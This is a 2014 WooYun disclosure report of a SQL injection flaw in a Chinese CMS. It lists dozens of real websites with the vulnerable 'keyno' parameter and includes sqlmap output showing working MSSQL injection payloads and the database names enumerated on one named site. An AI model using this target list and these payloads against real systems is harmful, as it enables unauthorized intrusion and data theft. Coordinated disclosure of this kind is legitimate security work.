当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080552

漏洞标题:某建站系统SQL注射漏洞

相关厂商:远洋科技

漏洞作者: 老和尚

提交时间:2014-10-26 22:53

修复时间:2015-01-24 22:54

公开时间:2015-01-24 22:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-03: 细节向第三方安全合作伙伴开放
2014-12-25: 细节向核心白帽子及相关领域专家公开
2015-01-04: 细节向普通白帽子公开
2015-01-14: 细节向实习白帽子公开
2015-01-24: 细节向公众公开

简要描述:

123456

详细说明:

#1.远洋科技(http://www.8ycn.com/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞第二弹。
第二弹,遗漏了。又挖了下,又挖到了。
漏洞存在页面:
http://www.lushengmetal.com/en/products_display.php?keyno=30313
http://www.tianjianchina.com/products_display.php?keyno=29874
http://www.sdxcgd.com/products_display.php?keyno=51467
http://www.sdxinlei.com/products_display.php?keyno=53691
http://www.bzbinhai.com/products_display.php?keyno=52243
http://www.sdmlw.com/products_display.php?keyno=34854
http://www.sdxhyz.com/products_display.php?keyno=51717
http://www.sdsxmm.com/products_display.php?keyno=51831
http://pengxian.8ycn.com.cn/products_display.php?keyno=
http://www.bzjdqd.com/products_display.php?keyno=52400
http://www.sdjwd.com/products_display.php?keyno=31240
http://www.sdyssw.com/products_display.php?keyno=61807
http://www.bztianma.com/products_display.php?keyno=51838
http://www.bzajst.com/products_display.php?keyno=52015
http://www.xhzxsw.com/products_display.php?keyno=51595
http://www.bzjzlxs.com/products_display.php?keyno=52057
http://www.bzsdmm.com/products_display.php?keyno=39411
http://www.cnynmy.com/products_display.php?keyno=53349
http://www.bzglsm.com/products_display.php?keyno=32313
http://www.dubangchuye.com/products_display.php?keyno=64251
http://www.bzdelixi.com/products_display.php?keyno=50282
http://www.bzqezl.com/products_display.php?keyno=36732
http://www.hmbaila.com/products_display.php?keyno=51134
http://www.wdxzx.com/products_display.php?keyno=37216
http://www.mituofo.net/products_display.php?keyno=37128
http://www.sdcfcg.com/products_display.php?keyno=35098
http://www.cnjjgm.com/products_display.php?keyno=41677
http://www.bzfyzl.com/products_display.php?keyno=50765
http://www.txjzy.com/products_display.php?keyno=52747
http://www.sdmdxg.com/products_display.php?keyno=39539
http://www.sdcymc.com/products_display.php?keyno=28094
http://www.sdhyjx888.com/products_display.php?keyno=36076
http://zhzzdz.com/products_display.php?keyno=58229
http://www.sdjsqjt.com/products_display.php?keyno=45443
http://huoguoyu.com/products_display.php?keyno=47006
http://bzxsdbj.cn/products_display.php?keyno=53870
http://www.bzbingang.com/products_display.php?keyno=59177
http://www.hmlxmy.com/products_display.php?keyno=51369
http://www.ysddc.com/products_display.php?keyno=51641
http://www.zphbsjc.com/products_display.php?keyno=42053
http://www.sdchunxiang.com/products_display.php?keyno=9926
http://www.bzbygc.com/products_display.php?keyno=41705
http://www.kdspjx.com/products_display.php?keyno=37753
案例还有很多的..

漏洞证明:

QQ图片20141024082346.jpg


QQ图片20141024082410.jpg


用穿山甲狂暴一顿就是了、

GET parameter 'keyno' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] Nsqlmap identified the following injection points with a total of 52 HTTP(s) requests:---Place: GETParameter: keyno    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: keyno=9926 AND 2281=2281    Type: error-based    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause    Payload: keyno=9926 AND 4352=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4352=4352) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(106)+CHAR(97)+CHAR(113)))    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries    Payload: keyno=9926; WAITFOR DELAY '0:0:5'--    Type: AND/OR time-based blind    Title: Microsoft SQL Server/Sybase time-based blind    Payload: keyno=9926 WAITFOR DELAY '0:0:5'--    Type: inline query    Title: Microsoft SQL Server/Sybase inline queries    Payload: keyno=(SELECT CHAR(113)+CHAR(120)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1477=1477) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(106)+CHAR(97)+CHAR(113))---[13:59:33] [INFO] testing Microsoft SQL Server[13:59:34] [INFO] confirming Microsoft SQL Server[13:59:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.1back-end DBMS: Microsoft SQL Server 2000[13:59:37] [INFO] fetching database names[13:59:38] [INFO] the SQL query used returns 28 entries[13:59:39] [INFO] retrieved: agent[13:59:40] [INFO] retrieved: auction[13:59:41] [INFO] retrieved: axqy[13:59:41] [INFO] retrieved: binzhouyuanlin[13:59:42] [INFO] retrieved: bxxsp[13:59:43] [INFO] retrieved: bysbd[13:59:44] [INFO] retrieved: bzyrcrm[13:59:45] [INFO] retrieved: crm[13:59:46] [INFO] retrieved: hmrc[13:59:46] [INFO] retrieved: ispdata[13:59:47] [INFO] retrieved: jfcx[13:59:48] [INFO] retrieved: master[13:59:49] [INFO] retrieved: menhuagent[13:59:50] [INFO] retrieved: model[13:59:51] [INFO] retrieved: msdb[13:59:51] [INFO] retrieved: newbeian[13:59:52] [INFO] retrieved: newbeiangcl[13:59:53] [INFO] retrieved: newgclcrm[13:59:54] [INFO] retrieved: newpaimai[13:59:55] [INFO] retrieved: Northwind[13:59:55] [INFO] retrieved: pubs[13:59:56] [INFO] retrieved: snmdb[13:59:57] [INFO] retrieved: tempdb[13:59:58] [INFO] retrieved: toupiao[13:59:59] [INFO] retrieved: wyww[14:00:00] [INFO] retrieved: wywwagent[14:00:01] [INFO] retrieved: yantai[14:00:01] [INFO] retrieved: yantaiceshiavailable databases [28]:[*] agent[*] auction[*] axqy[*] binzhouyuanlin[*] bxxsp[*] bysbd[*] bzyrcrm[*] crm[*] hmrc[*] ispdata[*] jfcx[*] master[*] menhuagent[*] model[*] msdb[*] newbeian[*] newbeiangcl[*] newgclcrm[*] newpaimai[*] Northwind[*] pubs[*] snmdb[*] tempdb[*] toupiao[*] wyww[*] wywwagent[*] yantai[*] yantaiceshi[14:00:02] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\www.sdchunxiang.com'

修复方案:

过滤参数

版权声明:转载请注明来源 老和尚@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-10-31 17:37

厂商回复:

最新状态:

暂无